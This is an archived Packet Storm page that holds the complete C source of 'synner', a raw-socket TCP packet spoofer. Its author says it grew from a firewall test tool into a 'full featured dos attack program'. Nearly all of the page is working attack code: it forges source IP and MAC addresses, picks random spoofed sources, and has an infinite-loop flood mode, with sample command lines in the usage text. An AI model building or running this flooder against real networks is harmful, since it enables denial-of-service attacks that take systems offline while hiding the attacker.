what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

synner.c

synner.c
Posted Sep 10, 2008
Authored by sm4x

Synner is a custom eth->ip->tcp packet generator (spoofer) for testing firewalls and dos attacks. It is capable of sending large amounts of prebuilt tcp packets (very quickly) with user defined ips, macs, tcp flags, window sizes, payload lengths and more.

tags | tool, scanner, tcp
systems | unix
SHA-256 | 23183ba81181a55b030c49ac1a3492fe2cd5491d498638603c826c1105c6b7e9

synner.c

Change Mirror Download
/*
sm4x - 2008
"synner.c" linux/x86
- part of my personal toolchain - released public ;)
- synner is able to send mass amounts of spoofed (mac/ip) eth->ip->tcp packets with user defined:
- source ips, tcp flags, window sizes, payload sizes, sequences ids, ack ids
- developed as a quick internal firewall/IDS testing prog but soon mutated into a full featured dos attack program.as during
testing I found it to literally destroy some of my fbsd/linux/openSol/win2k8 boxes at work
- many bugs are present so feel free to fix and/or comment...
v1.1 enjoy ;)
*/

#include <stdio.h>
#include <stdlib.h>

#include <sys/types.h>
#include <sys/socket.h>

#include <netinet/ip.h>
#include <netinet/in.h>
//#include <netinet/tcp.h>

#include <net/if.h>
#include <net/ethernet.h>
#include <linux/if_packet.h>

#include <time.h>
#include <unistd.h>
#include <signal.h>

/* tcp hdr */
struct tcphdr {
unsigned short source;
unsigned short dest;
unsigned long seq;
unsigned long ack_seq;
unsigned char len;
# if __BYTE_ORDER == __LITTLE_ENDIAN
u_int16_t fin:1;
u_int16_t syn:1;
u_int16_t rst:1;
u_int16_t psh:1;
u_int16_t ack:1;
u_int16_t urg:1;
u_int16_t res2:2;
# elif __BYTE_ORDER == __BIG_ENDIAN
u_int16_t res2:2;
u_int16_t urg:1;
u_int16_t ack:1;
u_int16_t psh:1;
u_int16_t rst:1;
u_int16_t syn:1;
u_int16_t fin:1;
# else
# error "Adjust your <bits/endian.h> defines"
# endif
unsigned short window;
unsigned short check;
unsigned short urg_ptr;
};

unsigned short calc_checksum(unsigned char *, int );
int count = 0;

/***********************************************************
* signalHandler
***********************************************************/
void signalHandler(int signal) {
time_t raw_t;
struct tm *timeinfo; char date[64];
time(&raw_t); timeinfo = localtime(&raw_t);
memset(date, 0x0, 64); strftime(date, 63, "%c", timeinfo);
printf("\n[+] PUNT!\n");
printf("[+] [%s] Sent %d packets.\n", date, count);
cleanup:
exit(0);
}

/**********************************************************
* usage
***********************************************************/
void usage() {
printf("[+] Usage:\n");
printf("[+] ./synner -i<iface> -s<IP> -S<MAC> -d<IP> -D<MAC> <options>\n");
printf("[+] -i\tinterface name\n");
printf("[+] -x\twhile(1) !! dos attack mode\n");
printf("[+] \t\t-amount of packets (ie: -x10000, -x0 for infinite)\n");
printf("[+] -s\tsource ip (spoofed)\n");
printf("[+] \t\t-(r)andom source ip\n");
printf("[+] -S\tsource MAC (spoofed)\n");
printf("[+] -d\tdest ip\n");
printf("[+] -D\tdest MAC\n");
printf("[+] -u\tsource port\n");
printf("[+] -p\tdest port\n");
printf("[+] -l\tpayload length (packet size filled with \\x00)\n");
printf("[+] -w\twindow size (<=65535)\n");
printf("[+] -f\tflags (s,a:p:u,r:f)\n");
printf("[+] \t\t-(s)yn, (a)ck, (p)push, (u)rgent, (r)eset, (f)in, (x)=ALL\n");
printf("[+] eg:\n");
printf("[+] ./synner -ieth0 -x -s192.168.1.1 -S00:AA:BB:CC:00:00 -d192.168.1.219 -D00:dd:ee:aa:dd:bb -p 6984 -l 512 -u5555 -fas\n");
printf("[+] ./synner -ieth0 -sr -S00:dd:ee:aa:dd:ff -d192.168.1.219 -D00:dd:ee:aa:dd:bb -p80 -u500 -fx\n\n");
exit(0);
}

/**********************************************************
* main
***********************************************************/
int main(int argc, char **argv) {
int bytes_sent = 0; int err = 0; int sock = 0; int ok_count = 0; int iface_num = 0; int packet_count = 0;
int dst_port = 666; int src_port = 2048; int is_verbose = 0; int payload_len = 32;
int window_len = 1024; int dos_mode = 0; int use_random_source_ip = 0; int use_random_source_mac = 0;
int flag_syn = 0; int flag_ack = 0; int flag_push = 0; int flag_urg = 0; int flag_rst = 0; int flag_fin = 0;

time_t raw_t;
struct tm *timeinfo;
struct sockaddr_ll sa;
struct ether_header eth_hdr;
struct iphdr ip_hdr;
struct tcphdr tcp_hdr;

char date[64]; char random_ips[1000*16];
char *iface = NULL; char *flgs = NULL;
char *src_ip = NULL; char *dest_ip = NULL;
char *src_mac = NULL; char *dest_mac = NULL;

if(getuid()) { printf("[-] Sorry d00d - gotta be r00t.\n"); return -1; }
printf("[+] synner by sm4x -> b0h!i!i\n");

if(signal(SIGINT, signalHandler) == SIG_IGN) {
printf("[+] Signal handlers are attached..\n");
signal (SIGINT, SIG_IGN);
}

// little big gross but it was written really REALLY fast ;)
opterr = 0; int option = 1;
while((option = getopt(argc, argv, "vi:x:s:S:d:D:u:p:l:w:f:?")) != -1 ) {
switch(option) {
case 'i':
iface = optarg;
printf("[+] Using: %s ", iface);
if(if_nametoindex(iface) == 0) { printf(" => INTERFACE NO GOOD!!\n"); exit(1); }
printf("OK.\n"); ok_count++;

break;
case 'x':
dos_mode = 1;
char *c = optarg;
if(c != NULL && atoi(c) > 0) {
packet_count = atoi(c);
printf("[+] Warning - DOS mode active (%d packets)!\n", packet_count);
} else {
printf("[+] Warning - DOS mode active!\n");
}
break;
case 's':
src_ip = optarg;
//printf("OPTARG: %s\n", src_ip);
if(src_ip[0] == 'r') {
printf("[+] Using random source IP(s)\n");
use_random_source_ip = 1;
} else {
printf("[+] Source IP: %s\n", src_ip);
} ok_count++;
break;
case 'S':
src_mac = optarg;
if(src_mac[0] == 'r') {
printf("[+] Using random source MAC(s)\n");
use_random_source_mac = 1;
} else {
printf("[+] Source MAC: %s\n", src_mac);
} ok_count++;
break;
case 'd':
dest_ip = optarg; ok_count++;
printf("[+] Dest IP: %s\n", dest_ip);
break;
case 'D':
dest_mac = optarg; ok_count++;
printf("[+] Dest MAC: %s\n", dest_mac);
break;
case 'p':
dst_port = atoi(optarg);
printf("[+] Dest port: %d\n", dst_port);
break;
case 'u':
src_port = atoi(optarg);
printf("[+] Source port: %d\n", src_port);
break;

case 'l':
payload_len = atoi(optarg);
printf("[+] Payload length: %d octets\n", payload_len);
break;
case 'w':
window_len = atoi(optarg);
if(window_len > 65535) { window_len = 65535; }
printf("[+] TCP Window length: %d octets\n", window_len);
break;
case 'f':
flgs = &optarg[0];
if(flgs != NULL) {
printf("[+] FLAGS: ");
while(*flgs) {
switch(*flgs) {
case 'x':
flag_syn = 1; flag_ack = 1; flag_push = 1; flag_urg = 1; flag_rst = 1; flag_fin = 1;
printf(" SYN|ACK|PSH|URG|RST|FIN");
flgs++; break;
case 's':
flag_syn = 1; printf("|SYN");
flgs++; break;
case 'a':
flag_ack = 1; printf("|ACK");
flgs++; break;
case 'p':
flag_push = 1; printf("|PSH");
flgs++; break;
case 'u':
flag_urg = 1; printf("|URG");
flgs++; break;
case 'f':
flag_fin = 1; printf("|FIN");
flgs++; break;
case 'r':
flag_rst = 1; printf("|RST");
flgs++; break;
}
} printf("\n");
} else {
printf("[+] Default: SYN/ACK flags are set!\n");
flag_syn = 1; flag_ack = 1;
}
break;
case 'v':
is_verbose = 1;
printf("[+] Vebosity is ON\n");
break;
}

}

if(ok_count < 5 || src_ip == NULL || dest_ip == NULL || src_mac == NULL || dest_mac == NULL) {
printf("[-] Invalid options supplied!\n");
usage();
}
/* define (new ??) packet */
char packet[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct tcphdr ) + payload_len];

iface_num = if_nametoindex(iface);
if(iface_num == 0) { printf("[-] IFACE %s IS REPORTED DOWN -> trying anyway.!\n", iface); }

/* as raw as we can get */
sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (sock < 0) { printf("[-] Unable to open a socket!?\n"); goto cleanup; }

// b/c we want high speed sendto() we need to build this before the while(1)
if(use_random_source_ip) {
memset(random_ips, 0x0, (1000*16));
int seed = time(NULL); int i = 0;
printf("[+] Generating random source IP(s)\n");
if(dos_mode) {
for(i = 0; i < 1000; i++ ) {
srand(seed+i);
int num1 = 0, num2 = 0, num3 = 0, num4 = 0;
num1 = rand()%254; num2 = rand()%254; num3 = rand()%254; num4 = rand()%254;
sprintf(random_ips+(i*16), "%d.%d.%d.%d\0", num1, num2, num3, num4);
//printf("RANDOMIP: %s\n", random_ips+(i*16));
}
} else {
int num1 = 0, num2 = 0, num3 = 0, num4 = 0;
srand(seed); num1 = rand()%254; num2 = rand()%254; num3 = rand()%254; num4 = rand()%254;
sprintf(random_ips, "%d.%d.%d.%d\0", num1, num2, num3, num4);
printf("[+] Random source IP: %s\n", random_ips);
} src_ip = random_ips;
}

if(is_verbose ==1 ) { printf("[+] Buliding payload...\n"); }
int len = sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct tcphdr) + payload_len;
memset(&packet, 0x0, len);

/* raw communication */
sa.sll_family = AF_PACKET;
sa.sll_protocol = htons(ETH_P_IP);
sa.sll_ifindex = iface_num;
sa.sll_hatype = 0x0000;
sa.sll_pkttype = 0x01;
sa.sll_halen = ETH_ALEN;

memset(&eth_hdr, 0x0, sizeof(struct ether_header));

/* ethernet frame setup*/
eth_hdr.ether_type = htons(ETHERTYPE_IP);

/* copy our source and dest hosts */
if((void *)ether_aton(dest_mac) == NULL) { printf("[-] Invalid dest mac address!\n"); goto cleanup; }
if(!use_random_source_mac && (void *)ether_aton(src_mac) == NULL) { printf("[-] Invalid source mac address!\n"); goto cleanup; }

memcpy(&eth_hdr.ether_dhost, (void *)ether_aton(dest_mac), 6);
memcpy(&eth_hdr.ether_shost, (void *)ether_aton(src_mac), 6);

memset(&ip_hdr, 0x0, sizeof(struct iphdr));
memset(&tcp_hdr, 0x0, sizeof(struct tcphdr));

/* ip frame setup */
ip_hdr.ihl = 0x05;
ip_hdr.version = 0x04;
ip_hdr.id = 0x00;
ip_hdr.tot_len = htons(len);
ip_hdr.frag_off = 0x00;
ip_hdr.ttl = 0x40;
ip_hdr.protocol = 0x06;

// inet_addr broadcast returns -1 so we guard
if(use_random_source_ip == 0 && strstr(src_ip, "255.255.255.255") == NULL) {
if(inet_addr(src_ip) == -1) { printf("[-] Invalid source ip!\n"); goto cleanup; }
}
if(inet_addr(dest_ip) == -1) { printf("[-] Invalid dest ip!\n"); goto cleanup; }

ip_hdr.saddr = inet_addr(src_ip);
ip_hdr.daddr = inet_addr(dest_ip);
ip_hdr.check = (unsigned short)calc_checksum((void *)&ip_hdr, sizeof(struct iphdr));

tcp_hdr.source = htons(src_port);
tcp_hdr.dest = htons(dst_port);

/* SEQ and ACK */
tcp_hdr.seq = htonl(rand()%65535);
tcp_hdr.ack_seq = htonl(rand()%65535);

/* syn and ack flags set */
tcp_hdr.syn = flag_syn; tcp_hdr.ack = flag_ack; tcp_hdr.fin = flag_fin;
tcp_hdr.rst = flag_rst; tcp_hdr.psh = flag_push; tcp_hdr.urg = flag_urg;
//tcp_hdr.len = htons(0x80);
tcp_hdr.len = 0x80;

tcp_hdr.window = htons(window_len);

/* incorrect checksum (assumes offload)-> (make sure add pseudo header etc...) */
tcp_hdr.check = 0x00;

memcpy(packet, &eth_hdr, sizeof(struct ether_header));
memcpy(packet+sizeof(struct ether_header), &ip_hdr, sizeof(struct iphdr));
memcpy(packet+sizeof(struct ether_header)+sizeof(struct iphdr), &tcp_hdr, sizeof(struct tcphdr));

if(is_verbose == 1) { printf("[+] Configuration ok!\n"); }
time(&raw_t); timeinfo = localtime(&raw_t);
memset(date, 0x0, 64);
strftime(date, 63, "%c", timeinfo);
printf("[+] [%s] Beginning send(s) now (h0ld it y00z)...\n", date);

int eth_len = sizeof(struct ether_header);
/*send the packet(s) */
count = 0; int i = 0;
if(dos_mode) {
int seed = time(NULL);
while(1) {
/* this is really messy - ugh */
if(use_random_source_ip) {
if(i > 1000) { i = 0; }
//printf("%d) IP: %s\n", i, random_ips+(i*16));
tcp_hdr.seq = i<<4; tcp_hdr.ack_seq = i<<4; // random junk for seq/ack
ip_hdr.saddr = inet_addr(random_ips+(i*16));
ip_hdr.check = (unsigned short)calc_checksum((void *)&ip_hdr, sizeof(struct iphdr));
// should set he packet via packet offset directly
memcpy(packet+eth_len, &ip_hdr, sizeof(struct iphdr)); i++;
}

bytes_sent = sendto(sock, packet, len, 0, (struct sockaddr*) &sa, sizeof(sa)); count++;
if (bytes_sent < 0) { if(is_verbose) { printf("[-] (%d) Unable to send syn packet!\n", count); } usleep(100); }
if(packet_count != 0 && count >= packet_count) { goto cleanup; }
}
} else {
bytes_sent = sendto(sock, packet, len, 0, (struct sockaddr*) &sa, sizeof(sa));
if (bytes_sent < 0) { if(is_verbose) { printf("[-] (%d) Unable to send syn packet!\n", count); } goto cleanup; }
printf("[+] Sent: %d bytes\n", bytes_sent); count++;
}

/* cleanup */
cleanup:
time(&raw_t); timeinfo = localtime(&raw_t);
memset(date, 0x0, 64);
strftime(date, 63, "%c", timeinfo);
printf("[+] [%s] Done: %d packets sent.\n", date, count);
close(sock);
return 0;
}

/**********************************************************
* checksum
**********************************************************/
unsigned short calc_checksum(unsigned char* data, int len) {
int i = 0; unsigned long sum = 0;
/* (going by 16bits) not the len of data (8 bit count from sizeof()) */
if((len & 1) == 0) { len = len >> 1; } else { len = (len >> 1) + 1; }

/* chop through the data 16bits and add to the 32 bit accumulator */
for(i = 0; i < len; i++) {
sum += *((unsigned short *)data); data += 2;
}
/* add the carries */
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (~sum);
}

// done
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close